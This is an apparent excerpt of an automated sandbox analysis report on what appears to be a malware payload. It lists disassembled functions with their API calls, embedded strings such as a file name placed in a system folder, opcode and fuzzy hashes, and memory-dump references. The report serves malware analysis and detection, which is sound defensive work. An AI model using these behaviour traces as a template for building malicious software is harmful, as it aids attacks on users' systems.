                                                                                                        • ___from_strstr_to_strchr.LIBCMT ref: 00F507C3
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ___from_strstr_to_strchr
                                                                                                        • String ID: error:%08lX:%s:%s:%s$func(%lu)$lib(%lu)$reason(%lu)
                                                                                                        • API String ID: 601868998-2416195885
                                                                                                        • Opcode ID: 888de3df76f02c9eb08567860826b1c2e6a2e8ddb218bbe0e050e76d8be42e6b
                                                                                                        • Instruction ID: 90b2d9d721183a009040038fd551bb67f8f59c5186eef67b916351071ce88212
                                                                                                        • Opcode Fuzzy Hash: 888de3df76f02c9eb08567860826b1c2e6a2e8ddb218bbe0e050e76d8be42e6b
                                                                                                        • Instruction Fuzzy Hash: 76411731A043055BDB20EE24DC45BAFB7D9AF84305F40082EFA8593241EB79E90C9B92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F416EB Relevance: 7.6, APIs: 5, Instructions: 112COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00F41726
                                                                                                        • _strlen.LIBCMT ref: 00F41734
                                                                                                          • Part of subcall function 00F25208: __getptd_noexit.LIBCMT ref: 00F25208
                                                                                                        • _strnlen.LIBCMT ref: 00F417BF
                                                                                                        • __lock.LIBCMT ref: 00F417D0
                                                                                                        • __getenv_helper_nolock.LIBCMT ref: 00F417DB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __getenv_helper_nolock$__getptd_noexit__lock_strlen_strnlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 2168648987-0
                                                                                                        • Opcode ID: 850b49e8017e61c37cae0e2218a7f27d7bfa6fc7c2fee9536c0d7da6c053dfb9
                                                                                                        • Instruction ID: e7d5d4f93562e1e07c21522f4c6228716ee13ebc4a355d6821552740a7868fd1
                                                                                                        • Opcode Fuzzy Hash: 850b49e8017e61c37cae0e2218a7f27d7bfa6fc7c2fee9536c0d7da6c053dfb9
                                                                                                        • Instruction Fuzzy Hash: ED31F732E45235AADB21ABA8EC02B9E3E94BF04B70F140115FC14DB2C1DF7CD880B6A1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F3B6FF Relevance: 7.6, APIs: 5, Instructions: 67COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _malloc.LIBCMT ref: 00F3B70B
                                                                                                          • Part of subcall function 00F20C62: __FF_MSGBANNER.LIBCMT ref: 00F20C79
                                                                                                          • Part of subcall function 00F20C62: __NMSG_WRITE.LIBCMT ref: 00F20C80
                                                                                                          • Part of subcall function 00F20C62: RtlAllocateHeap.NTDLL(00750000,00000000,00000001,00000000,00000000,00000000,?,00F28CF4,?,?,?,00000000,?,00F28BE1,00000018,01007BD0), ref: 00F20CA5
                                                                                                        • _free.LIBCMT ref: 00F3B71E
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap_free_malloc
                                                                                                        • String ID:
                                                                                                        • API String ID: 1020059152-0
                                                                                                        • Opcode ID: b33a29c39ac997df1a3e5940c82d6d8747025b33e55b65a4e85f4a51a4848dda
                                                                                                        • Instruction ID: 7b5985dc821e47b4857669cebc0b8605ca6c10cd9388ab107be72347b0920750
                                                                                                        • Opcode Fuzzy Hash: b33a29c39ac997df1a3e5940c82d6d8747025b33e55b65a4e85f4a51a4848dda
                                                                                                        • Instruction Fuzzy Hash: AC11A332808729EBCB213B74BC55B6E3B94EF54770F100625FA989A191DB398840B7D0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1F070 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00F1F085
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1F0AC
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F1F0B6
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1F0C4
                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 00F1F0D2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 1380987712-0
                                                                                                        • Opcode ID: 0014f03c4298388b5bed177f5e02448f6ed422631a14380c9d99cca2880a764b
                                                                                                        • Instruction ID: 32050d36856c5ca0cff8feaed18e8461b6d7007fb2133214565cab87f2b0d82a
                                                                                                        • Opcode Fuzzy Hash: 0014f03c4298388b5bed177f5e02448f6ed422631a14380c9d99cca2880a764b
                                                                                                        • Instruction Fuzzy Hash: 1B016231E4030D6AEB30AB55ED4BFD63B6CBB48B14F544011FA04AB1D1D6BAA849DBE4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1E500 Relevance: 7.5, APIs: 5, Instructions: 49windowsynchronizationthreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(00000012,00000000,00000000), ref: 00F1E515
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1E53C
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F1E546
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1E554
                                                                                                        • WaitForSingleObject.KERNEL32(0000000A), ref: 00F1E562
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 1380987712-0
                                                                                                        • Opcode ID: 5ae096684533368ec5d7a1aab483ae470dde316eb756ae6bf58daa143fc1a003
                                                                                                        • Instruction ID: 1832e865786a0840d284a04882dfc96d66dd8050a1ba512ceaa65c9c8e5e0fbf
                                                                                                        • Opcode Fuzzy Hash: 5ae096684533368ec5d7a1aab483ae470dde316eb756ae6bf58daa143fc1a003
                                                                                                        • Instruction Fuzzy Hash: 6D018F31B403097AEA20AB50ED46FE67B69A744B14F144011FA04AB1D1E6EAA949DBA4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1FA40 Relevance: 7.5, APIs: 5, Instructions: 48windowsynchronizationthreadCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(?,00000012,00000000,00000000), ref: 00F1FA53
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1FA71
                                                                                                        • DispatchMessageW.USER32(?), ref: 00F1FA7B
                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F1FA89
                                                                                                        • WaitForSingleObject.KERNEL32(?,0000000A,?,00000012,00000000,00000000), ref: 00F1FA94
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Message$Peek$DispatchObjectPostSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 1380987712-0
                                                                                                        • Opcode ID: 847d90be9bd26a0726ea4e920b3f736d746d6baaec05237da63874b85aef67b9
                                                                                                        • Instruction ID: 4ade58a82910a3c872de98f192cb00e32583a683d21c13ddd5d49cae533878fa
                                                                                                        • Opcode Fuzzy Hash: 847d90be9bd26a0726ea4e920b3f736d746d6baaec05237da63874b85aef67b9
                                                                                                        • Instruction Fuzzy Hash: 1F018631F40309BBEB209B55DD4BFA63B6CAB44B10F544061FA04AF1D1D7E9A84596E0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F573F0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 251COMMONLIBRARYCODE
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: __aulldvrm
                                                                                                        • String ID: $+$0123456789ABCDEF
                                                                                                        • API String ID: 1302938615-1400378107
                                                                                                        • Opcode ID: 70d3359d99fa96a512ebf6065fde110672db5d23778765169c7e7cfa4a438d14
                                                                                                        • Instruction ID: b44096e9bc589134e14ed398f1a4ab8afe82c5adb5dada556369674b02363ca3
                                                                                                        • Opcode Fuzzy Hash: 70d3359d99fa96a512ebf6065fde110672db5d23778765169c7e7cfa4a438d14
                                                                                                        • Instruction Fuzzy Hash: 2E819DB1A087508FD710DF28A84062BBBE5BFC8755F19091DFE99A7212E334DD099B92
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F17BA0 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 188COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        • Opcode ID: 2ee222681d7ac6d67c8ed62abee521d6ebdc97a014c8a47985168345d3bb7e8e
                                                                                                        • Instruction ID: 42a654bbe93e1b83090eca86f6cb1450fe1340ebf2e1056ca69595e684b9beac
                                                                                                        • Opcode Fuzzy Hash: 2ee222681d7ac6d67c8ed62abee521d6ebdc97a014c8a47985168345d3bb7e8e
                                                                                                        • Instruction Fuzzy Hash: A351B5727083049BDB28EE1CDC80AAA77B6EF84710B24891DF859CB345DB31DD91ABD4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F14160 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: _memmove
                                                                                                        • String ID: invalid string position$string too long
                                                                                                        • API String ID: 4104443479-4289949731
                                                                                                        • Opcode ID: 6eb4b2edde54fab078c8cd951bf44d17bff2f8d53dc169821bd0673907f3035a
                                                                                                        • Instruction ID: d64465a59ecea3d1f2a270dcf6706e76a4ab18978299ae7af06f607f1385a091
                                                                                                        • Opcode Fuzzy Hash: 6eb4b2edde54fab078c8cd951bf44d17bff2f8d53dc169821bd0673907f3035a
                                                                                                        • Instruction Fuzzy Hash: 6B31F471700244ABDB28DE5CDC819AA77B6EFC07207604A1CF865DB285D731FDC1ABA4
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F0C5C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 72COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • UuidCreate.RPCRT4(?), ref: 00F0C5DA
                                                                                                        • UuidToStringA.RPCRT4(?,00000000), ref: 00F0C5F6
                                                                                                        • RpcStringFreeA.RPCRT4(00000000), ref: 00F0C640
                                                                                                        Strings
                                                                                                        • 8a4577dc-de55-4eb5-b48a-8a3eee60cd95, xrefs: 00F0C687
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: StringUuid$CreateFree
                                                                                                        • String ID: 8a4577dc-de55-4eb5-b48a-8a3eee60cd95
                                                                                                        • API String ID: 3044360575-2335240114
                                                                                                        • Opcode ID: a609f9481376859d38ab73078bb92a8b4590b0cd084d35bcc4180e4695539c22
                                                                                                        • Instruction ID: ecf93805c208018c312e6d72e898bc4680a7db2effe5516ce7b63f7fb34254dd
                                                                                                        • Opcode Fuzzy Hash: a609f9481376859d38ab73078bb92a8b4590b0cd084d35bcc4180e4695539c22
                                                                                                        • Instruction Fuzzy Hash: A7210772608345ABD7209F24DC05B9BBBE8AF81754F004A2EF48983291D776D548A7D2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F0C470 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 00F0C48B
                                                                                                        • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 00F0C4A9
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Path$AppendFolder
                                                                                                        • String ID: bowsakkdestx.txt
                                                                                                        • API String ID: 29327785-2616962270
                                                                                                        • Opcode ID: 7096c8be0a0cdce8e75a5cf1f08fc3bdc2f1a55dba9982f476ddaf6e618bb822
                                                                                                        • Instruction ID: dc4430833b1e543478b94c8dc8ee61ae3f8728283ae0056b3f69e810ebf52354
                                                                                                        • Opcode Fuzzy Hash: 7096c8be0a0cdce8e75a5cf1f08fc3bdc2f1a55dba9982f476ddaf6e618bb822
                                                                                                        • Instruction Fuzzy Hash: 3401D672A8022C33DA30A6A4BC87FFF775C9F51721F0001A6FE08D7181E6A9998676D1
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Function 00F1BA10 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24registryCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00F1BA4A
                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00F1BA73
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000003.00000002.2884899861.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                        • Associated: 00000003.00000002.2884864942.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2884974054.0000000000FCC000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885022316.000000000100A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885104696.000000000100C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001010000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.000000000101A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885147104.0000000001029000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                        • Associated: 00000003.00000002.2885267998.000000000102B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_3_2_f00000_c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_paylo.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: ClassCursorLoadRegister
                                                                                                        • String ID: 0$>
                                                                                                        • API String ID: 1693014935-1374489303
                                                                                                        • Opcode ID: 141e1cee009ffb48c7ec4e7f3f2488faa7bd4b4cf4c71f1e583b8a01b49b4646
                                                                                                        • Instruction ID: f54a1634d9bb86654836fb96bcba2682caad2d9698462fdce6d039f246e1f5a4
                                                                                                        • Opcode Fuzzy Hash: 141e1cee009ffb48c7ec4e7f3f2488faa7bd4b4cf4c71f1e583b8a01b49b4646
